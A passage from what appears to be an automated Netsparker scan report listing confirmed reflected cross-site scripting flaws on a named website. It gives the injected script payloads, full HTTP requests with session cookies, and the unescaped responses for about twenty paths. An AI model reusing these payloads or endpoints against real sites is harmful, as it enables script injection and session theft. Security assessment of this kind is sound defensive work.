Accept-Encoding: gzip, deflate
emailtonews=netsparker%40example.com&
Response
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Date: Tue, 20 May 2014 14:03:14 GMT
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Content-Length: 191
Pragma: no-cache
Expires: Tue, 01 Jan 1971 02:00:00 GMT
404;http://www.shalomlaam.co.il:80/contact/reg/maillingUpdate.asp?'"--></style></script><script>netsparker(0x00049B)</script><BR>script><BR>style><<script>netsparker(0x00049B)<.asp?
id=script>
3.4. /images/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000105)%3C/script%3E
CONFIRMED
http://www.shalomlaam.co.il/images/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000105)%3C/..
Parameters
Parameter Type Value
URI-BASED Full URL '"--></style></script>
<script>alert(0x000105)</script>
Request
GET /images/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000105)%3C/script%3E HTTP/1.1
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Accept-Language: en-us,en;q=0.5
Host: www.shalomlaam.co.il
Cookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMA
Accept-Encoding: gzip, deflate
Response
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Date: Tue, 20 May 2014 13:44:09 GMT
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Content-Length: 167
Pragma: no-cache
Expires: Tue, 01 Jan 1971 02:00:00 GMT
404;http://www.shalomlaam.co.il:80/images/'"--></style></script><script>netsparker(0x000105)</script><BR>script><BR>style><<script>netsparker(0x000105)<.asp?id=script>
3.5. /bmidrash/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0001C7)%3C/script%3E
CONFIRMED
http://www.shalomlaam.co.il/bmidrash/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0001C7)%3..
Parameters
Parameter Type Value
URI-BASED Full URL '"--></style></script>
<script>alert(0x0001C7)</script>
Request
GET /bmidrash/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001C7)%3C/script%3E HTTP/1.1
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Accept-Language: en-us,en;q=0.5
Host: www.shalomlaam.co.il
Cookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMA
Accept-Encoding: gzip, deflate
24 / 146
Response
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Date: Tue, 20 May 2014 13:47:53 GMT
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Content-Length: 169
Pragma: no-cache
Expires: Tue, 01 Jan 1971 02:00:00 GMT
404;http://www.shalomlaam.co.il:80/bmidrash/'"--></style></script><script>netsparker(0x0001C7)</script><BR>script><BR>style><<script>netsparker(0x0001C7)<.asp?id=script>
3.6. /js/+%20win%20+'%22--
%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000409)%3C/script%3E
CONFIRMED
http://www.shalomlaam.co.il/js/+%20win%20+'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0004..
Parameters
Parameter Type Value
URI-BASED Full URL '"--></style></script>
<script>alert(0x000409)</script>
Request
GET /js/+%20win%20+'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000409)%3C/script%3E HTTP/1.1
Referer: http://www.shalomlaam.co.il/js/func_site.js
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Accept-Language: en-us,en;q=0.5
Host: www.shalomlaam.co.il
Cookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMA
Accept-Encoding: gzip, deflate
Response
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Date: Tue, 20 May 2014 14:00:53 GMT
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Content-Length: 170
Pragma: no-cache
Expires: Tue, 01 Jan 1971 02:00:00 GMT
404;http://www.shalomlaam.co.il:80/js/+ win +'"--></style></script><script>netsparker(0x000409)</script><BR>script><BR>style><<script>netsparker(0x000409)<.asp?id=script>
3.7. /video/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0001CE)%3C/script%3E
CONFIRMED
http://www.shalomlaam.co.il/video/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0001CE)%3C/s..
Parameters
Parameter Type Value
URI-BASED Full URL '"--></style></script>
<script>alert(0x0001CE)</script>
Request
GET /video/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001CE)%3C/script%3E HTTP/1.1
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Accept-Language: en-us,en;q=0.5
Host: www.shalomlaam.co.il
Cookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMA
Accept-Encoding: gzip, deflate
Response
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Date: Tue, 20 May 2014 13:47:58 GMT
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Content-Length: 166
Pragma: no-cache
Expires: Tue, 01 Jan 1971 02:00:00 GMT
404;http://www.shalomlaam.co.il:80/video/'"--></style></script><script>netsparker(0x0001CE)</script><BR>script><BR>style><<script>netsparker(0x0001CE)<.asp?id=script>
25 / 146
3.8. /news'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0001B7)%3C/script%3E
CONFIRMED
http://www.shalomlaam.co.il/news'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0001B7)%3C/scr..
Parameters
Parameter Type Value
URI-BASED Full URL '"--></style></script>
<script>alert(0x0001B7)</script>
Request
GET /news'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001B7)%3C/script%3E HTTP/1.1
Referer: http://www.shalomlaam.co.il/
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Accept-Language: en-us,en;q=0.5
Host: www.shalomlaam.co.il
Cookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMA
Accept-Encoding: gzip, deflate
Response
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Date: Tue, 20 May 2014 13:47:29 GMT
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Content-Length: 164
Pragma: no-cache
Expires: Tue, 01 Jan 1971 02:00:00 GMT
404;http://www.shalomlaam.co.il:80/news'"--></style></script><script>netsparker(0x0001B7)</script><BR>script><BR>style><<script>netsparker(0x0001B7)<.asp?id=script>
3.9. /gvideo/testimonialrotator/testimonialrotator.js'%22--
%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000449)%3C/script%3E
CONFIRMED
http://www.shalomlaam.co.il/gvideo/testimonialrotator/testimonialrotator.js'%22--%3E%3C/style%3E%3C/..
Parameters
Parameter Type Value
URI-BASED Full URL '"--></style></script>
<script>alert(0x000449)</script>
Request
GET /gvideo/testimonialrotator/testimonialrotator.js'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000449)%3C/script%3E HTTP/1.1
Referer: http://www.shalomlaam.co.il/gvideo/index.html
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Accept-Language: en-us,en;q=0.5
Host: www.shalomlaam.co.il
Cookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMA
Accept-Encoding: gzip, deflate
Response
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Date: Tue, 20 May 2014 14:01:40 GMT
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Content-Length: 207
Pragma: no-cache
Expires: Tue, 01 Jan 1971 02:00:00 GMT
404;http://www.shalomlaam.co.il:80/gvideo/testimonialrotator/testimonialrotator.js'"--></style></script><script>netsparker(0x000449)</script><BR>script><BR>style>
<<script>netsparker(0x000449)<.asp?id=script>
26 / 146
3.10. /js/delate_image.asp CONFIRMED
http://www.shalomlaam.co.il/js/delate_image.asp?'"--></style></script><script>alert(0x0003D6)</script>
Parameters
Parameter Type Value
field GET picture_
Query Based Query String '"--></style></script>
<script>alert(0x0003D6)</script>
Request
GET /js/delate_image.asp?'"--></style></script><script>netsparker(0x0003D6)</script> HTTP/1.1
Referer: http://www.shalomlaam.co.il/js/func_site.js
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Accept-Language: en-us,en;q=0.5
Host: www.shalomlaam.co.il
Cookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMA
Accept-Encoding: gzip, deflate
Response
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Date: Tue, 20 May 2014 14:00:30 GMT
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Content-Length: 180
Pragma: no-cache
Expires: Tue, 01 Jan 1971 02:00:00 GMT
404;http://www.shalomlaam.co.il:80/js/delate_image.asp?'"--></style></script><script>netsparker(0x0003D6)</script><BR>script><BR>style><<script>netsparker(0x0003D6)<.asp?id=script>
3.11. /'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0000DB)%3C/script%3E
CONFIRMED
http://www.shalomlaam.co.il/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0000DB)%3C/script%3E
Parameters
Parameter Type Value
URI-BASED Full URL '"--></style></script>
<script>alert(0x0000DB)</script>
Request
GET /'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0000DB)%3C/script%3E HTTP/1.1
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Accept-Language: en-us,en;q=0.5
Host: www.shalomlaam.co.il
Cookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMA
Accept-Encoding: gzip, deflate
Response
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Date: Tue, 20 May 2014 13:43:53 GMT
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Content-Length: 160
Pragma: no-cache
Expires: Tue, 01 Jan 1971 02:00:00 GMT
404;http://www.shalomlaam.co.il:80/'"--></style></script><script>netsparker(0x0000DB)</script><BR>script><BR>style><<script>netsparker(0x0000DB)<.asp?id=script>
3.12. /pitgam'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00013F)%3C/script%3E
CONFIRMED
http://www.shalomlaam.co.il/pitgam'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00013F)%3C/s..
Parameters
Parameter Type Value
URI-BASED Full URL '"--></style></script>
<script>alert(0x00013F)</script>
27 / 146
Request
GET /pitgam'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x00013F)%3C/script%3E HTTP/1.1
Referer: http://www.shalomlaam.co.il/
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Accept-Language: en-us,en;q=0.5
Host: www.shalomlaam.co.il
Cookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMA
Accept-Encoding: gzip, deflate
Response
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Date: Tue, 20 May 2014 13:44:38 GMT
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Content-Length: 166
Pragma: no-cache
Expires: Tue, 01 Jan 1971 02:00:00 GMT
404;http://www.shalomlaam.co.il:80/pitgam'"--></style></script><script>netsparker(0x00013F)</script><BR>script><BR>style><<script>netsparker(0x00013F)<.asp?id=script>
3.13. /alon/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000150)%3C/script%3E
CONFIRMED
http://www.shalomlaam.co.il/alon/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000150)%3C/sc..
Parameters
Parameter Type Value
URI-BASED Full URL '"--></style></script>
<script>alert(0x000150)</script>
Request
GET /alon/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000150)%3C/script%3E HTTP/1.1
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Accept-Language: en-us,en;q=0.5
Host: www.shalomlaam.co.il
Cookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMA
Accept-Encoding: gzip, deflate
Response
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Date: Tue, 20 May 2014 13:44:50 GMT
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Content-Length: 165
Pragma: no-cache
Expires: Tue, 01 Jan 1971 02:00:00 GMT
404;http://www.shalomlaam.co.il:80/alon/'"--></style></script><script>netsparker(0x000150)</script><BR>script><BR>style><<script>netsparker(0x000150)<.asp?id=script>
3.14. /gvideo/style/style.css'%22--
%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000452)%3C/script%3E
CONFIRMED
http://www.shalomlaam.co.il/gvideo/style/style.css'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealer..
Parameters
Parameter Type Value
URI-BASED Full URL '"--></style></script>
<script>alert(0x000452)</script>
Request
GET /gvideo/style/style.css'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000452)%3C/script%3E HTTP/1.1
Referer: http://www.shalomlaam.co.il/gvideo/index.html
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Accept-Language: en-us,en;q=0.5
Host: www.shalomlaam.co.il
Cookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMA
Accept-Encoding: gzip, deflate
28 / 146
Response
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Date: Tue, 20 May 2014 14:01:43 GMT
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Content-Length: 182
Pragma: no-cache
Expires: Tue, 01 Jan 1971 02:00:00 GMT
404;http://www.shalomlaam.co.il:80/gvideo/style/style.css'"--></style></script><script>netsparker(0x000452)</script><BR>script><BR>style><<script>netsparker(0x000452)<.asp?id=script>
3.15. /alon/Default.asp'%22--
%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00043A)%3C/script%3E
CONFIRMED
http://www.shalomlaam.co.il/alon/Default.asp'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00..
Parameters
Parameter Type Value
id GET 0
URI-BASED Full URL '"--></style></script>
<script>alert(0x00043A)</script>
Request
GET /alon/Default.asp'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x00043A)%3C/script%3E HTTP/1.1
Referer: http://www.shalomlaam.co.il/site/alon/
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Accept-Language: en-us,en;q=0.5
Host: www.shalomlaam.co.il
Cookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMA
Accept-Encoding: gzip, deflate
Response
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Date: Tue, 20 May 2014 14:01:34 GMT
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Content-Length: 176
Pragma: no-cache
Expires: Tue, 01 Jan 1971 02:00:00 GMT
404;http://www.shalomlaam.co.il:80/alon/Default.asp'"--></style></script><script>netsparker(0x00043A)</script><BR>script><BR>style><<script>netsparker(0x00043A)<.asp?id=script>
3.16. /site/alon/'%22--
%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00012E)%3C/script%3E
CONFIRMED
http://www.shalomlaam.co.il/site/alon/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00012E)%..
Parameters
Parameter Type Value
URI-BASED Full URL '"--></style></script>
<script>alert(0x00012E)</script>
Request
GET /site/alon/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x00012E)%3C/script%3E HTTP/1.1
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Accept-Language: en-us,en;q=0.5
Host: www.shalomlaam.co.il
Cookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMA
Accept-Encoding: gzip, deflate
Response
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Date: Tue, 20 May 2014 13:44:25 GMT
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Content-Length: 170
Pragma: no-cache
Expires: Tue, 01 Jan 1971 02:00:00 GMT
404;http://www.shalomlaam.co.il:80/site/alon/'"--></style></script><script>netsparker(0x00012E)</script><BR>script><BR>style><<script>netsparker(0x00012E)<.asp?id=script>
29 / 146
3.17. /page/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0004E9)%3C/script%3E
CONFIRMED
http://www.shalomlaam.co.il/page/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0004E9)%3C/sc..
Parameters
Parameter Type Value
URI-BASED Full URL '"--></style></script>
<script>alert(0x0004E9)</script>
Request
GET /page/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0004E9)%3C/script%3E HTTP/1.1
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Accept-Language: en-us,en;q=0.5
Host: www.shalomlaam.co.il
Cookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMA
Accept-Encoding: gzip, deflate
Response
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Date: Tue, 20 May 2014 14:03:46 GMT
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Content-Length: 165
Pragma: no-cache
Expires: Tue, 01 Jan 1971 02:00:00 GMT
404;http://www.shalomlaam.co.il:80/page/'"--></style></script><script>netsparker(0x0004E9)</script><BR>script><BR>style><<script>netsparker(0x0004E9)<.asp?id=script>
3.18. /lessons/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0001A8)%3C/script%3E
CONFIRMED
http://www.shalomlaam.co.il/lessons/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0001A8)%3C..
Parameters
Parameter Type Value
URI-BASED Full URL '"--></style></script>
<script>alert(0x0001A8)</script>
Request
GET /lessons/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001A8)%3C/script%3E HTTP/1.1
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Accept-Language: en-us,en;q=0.5
Host: www.shalomlaam.co.il
Cookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMA
Accept-Encoding: gzip, deflate
Response
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Date: Tue, 20 May 2014 13:47:20 GMT
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Content-Length: 168
Pragma: no-cache
Expires: Tue, 01 Jan 1971 02:00:00 GMT
404;http://www.shalomlaam.co.il:80/lessons/'"--></style></script><script>netsparker(0x0001A8)</script><BR>script><BR>style><<script>netsparker(0x0001A8)<.asp?id=script>
3.19. /about/search/'%22--
%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00052F)%3C/script%3E
CONFIRMED
http://www.shalomlaam.co.il/about/search/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00052..
Parameters
Parameter Type Value
URI-BASED Full URL '"--></style></script>
<script>alert(0x00052F)</script>
30 / 146
Request
GET /about/search/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x00052F)%3C/script%3E HTTP/1.1
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Accept-Language: en-us,en;q=0.5
Host: www.shalomlaam.co.il
Cookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMA
Accept-Encoding: gzip, deflate
Response
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Date: Tue, 20 May 2014 14:04:11 GMT
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Content-Length: 173
Pragma: no-cache
Expires: Tue, 01 Jan 1971 02:00:00 GMT
404;http://www.shalomlaam.co.il:80/about/search/'"--></style></script><script>netsparker(0x00052F)</script><BR>script><BR>style><<script>netsparker(0x00052F)<.asp?id=script>
3.20. /js/upload_image.asp CONFIRMED
http://www.shalomlaam.co.il/js/upload_image.asp?'"--></style></script><script>alert(0x0003B2)</script>
Parameters
Parameter Type Value
field GET picture_
Query Based Query String '"--></style></script>
<script>alert(0x0003B2)</script>
Request
GET /js/upload_image.asp?'"--></style></script><script>netsparker(0x0003B2)</script> HTTP/1.1
Referer: http://www.shalomlaam.co.il/js/func_site.js
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Accept-Language: en-us,en;q=0.5
Host: www.shalomlaam.co.il
Cookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMA
Accept-Encoding: gzip, deflate
Response
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Date: Tue, 20 May 2014 14:00:21 GMT
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Content-Length: 180
Pragma: no-cache
Expires: Tue, 01 Jan 1971 02:00:00 GMT
404;http://www.shalomlaam.co.il:80/js/upload_image.asp?'"--></style></script><script>netsparker(0x0003B2)</script><BR>script><BR>style><<script>netsparker(0x0003B2)<.asp?id=script>
3.21. /site/alon/archive.asp'%22--
%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00029F)%3C/script%3E
CONFIRMED
http://www.shalomlaam.co.il/site/alon/archive.asp'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert..
Parameters
Parameter Type Value
URI-BASED Full URL '"--></style></script>
<script>alert(0x00029F)</script>
Request
GET /site/alon/archive.asp'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x00029F)%3C/script%3E HTTP/1.1
Referer: http://www.shalomlaam.co.il/sitemap.xml
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Accept-Language: en-us,en;q=0.5
Host: www.shalomlaam.co.il
Cookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMA
Accept-Encoding: gzip, deflate
31 / 146
Response
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Date: Tue, 20 May 2014 13:56:21 GMT
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Content-Length: 181
Pragma: no-cache
Expires: Tue, 01 Jan 1971 02:00:00 GMT
404;http://www.shalomlaam.co.il:80/site/alon/archive.asp'"--></style></script><script>netsparker(0x00029F)</script><BR>script><BR>style><<script>netsparker(0x00029F)<.asp?id=script>
3.22. /ask/search/'%22--
%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000646)%3C/script%3E
CONFIRMED
http://www.shalomlaam.co.il/ask/search/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000646)..
Parameters
Parameter Type Value
URI-BASED Full URL '"--></style></script>
<script>alert(0x000646)</script>
Request
GET /ask/search/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000646)%3C/script%3E HTTP/1.1
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Accept-Language: en-us,en;q=0.5
Host: www.shalomlaam.co.il
Cookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMA
Accept-Encoding: gzip, deflate
Response
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Date: Tue, 20 May 2014 14:08:01 GMT
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Content-Length: 171
Pragma: no-cache
Expires: Tue, 01 Jan 1971 02:00:00 GMT
404;http://www.shalomlaam.co.il:80/ask/search/'"--></style></script><script>netsparker(0x000646)</script><BR>script><BR>style><<script>netsparker(0x000646)<.asp?id=script>
3.23. /search/default.asp CONFIRMED
http://www.shalomlaam.co.il/search/default.asp?q='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert..
Parameters
Parameter Type Value
q GET '"--></style></script>
<script>alert(0x000245)</script>
Request
